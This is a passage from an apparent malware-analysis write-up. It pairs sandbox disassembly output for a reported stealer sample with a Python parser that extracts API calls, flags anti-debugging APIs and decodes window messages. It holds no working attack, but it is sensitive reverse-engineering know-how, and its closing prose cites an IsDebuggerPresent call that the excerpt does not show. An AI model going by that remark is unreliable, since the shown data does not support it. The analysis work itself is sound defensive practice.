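• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002B100A), ref: 002EB303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002EB2FE
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Instruction Fuzzy Hash: 35E06D746107418FD7229F29D5457877BE8AF00714F408D6DE886C7661E7B4D458CBA1
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0033596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00335981
  • Part of subcall function 00315244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003152BC
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
"""

# One API bullet: optional sub-call prefix, Name.MODULE, optional (args), then "ref: <addr>".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                   # address of the call instruction
    subcall_of: int | None     # callee address when the call sits inside a sub-function


@dataclass
class FunctionRecord:
    api_calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)
    dump_source: str = ""


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the plugin's plain-text output into one FunctionRecord per analysed function."""
    records: list[FunctionRecord] = []
    current: FunctionRecord | None = None
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":                 # every record starts with its APIs section
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if not line or current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs" and (m := API_RE.match(line)):
            args = m.group("args").split(",") if m.group("args") is not None else []
            sub = m.group("sub")
            current.api_calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
        elif section == "Strings":             # "<literal>, xrefs: <addr>"; the literal may contain commas
            current.strings.append(body.rsplit(", xrefs:", 1)[0])
        elif section == "Memory Dump Source" and body.startswith("Source File:"):
            current.dump_source = body[len("Source File:"):].split(",", 1)[0].strip()
        elif section == "Similarity":
            key, _, value = body.partition(": ")
            current.similarity[key] = value
    return records


# Editor's watch-list, not part of the report: APIs whose direct use merits a look in a stealer sample.
ANTI_DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "OutputDebugStringA", "OutputDebugStringW"}


def flag_anti_debug(records: list[FunctionRecord]) -> list[tuple[int, str, list[str]]]:
    """(record index, API ID, sorted hits) for records calling a watch-listed API directly, not via a sub-call."""
    out = []
    for i, rec in enumerate(records):
        hits = sorted({c.name for c in rec.api_calls if c.subcall_of is None} & ANTI_DEBUG_APIS)
        if hits:
            out.append((i, rec.similarity.get("API ID", ""), hits))
    return out


WINDOW_MESSAGES = {0x0111: "WM_COMMAND", 0x0182: "LB_DELETESTRING"}   # editor's table; only what this page uses


def decode_window_messages(records: list[FunctionRecord]) -> list[tuple[int, str, int, str]]:
    """(record index, api, uMsg, name) for Send/PostMessageW calls whose uMsg argument is a visible hex constant."""
    out = []
    for i, rec in enumerate(records):
        for c in rec.api_calls:
            # Calls the plugin rendered with fewer arguments, e.g. PostMessageW(00000000), are skipped.
            if c.name in ("SendMessageW", "PostMessageW") and len(c.args) >= 2 and re.fullmatch(r"[0-9A-Fa-f]+", c.args[1]):
                msg = int(c.args[1], 16)
                out.append((i, c.name, msg, WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")))
    return out
```

Direct calls and sub-calls are kept apart deliberately: the IsDebuggerPresent in the CAtlBaseModule record is ATL start-up boilerplate the compiler emits, and treating every sub-call as the function's own behaviour would make the whole binary look like an anti-debugging routine. Run the same two passes over the full report export rather than the abridged sample to get the complete picture for this sample.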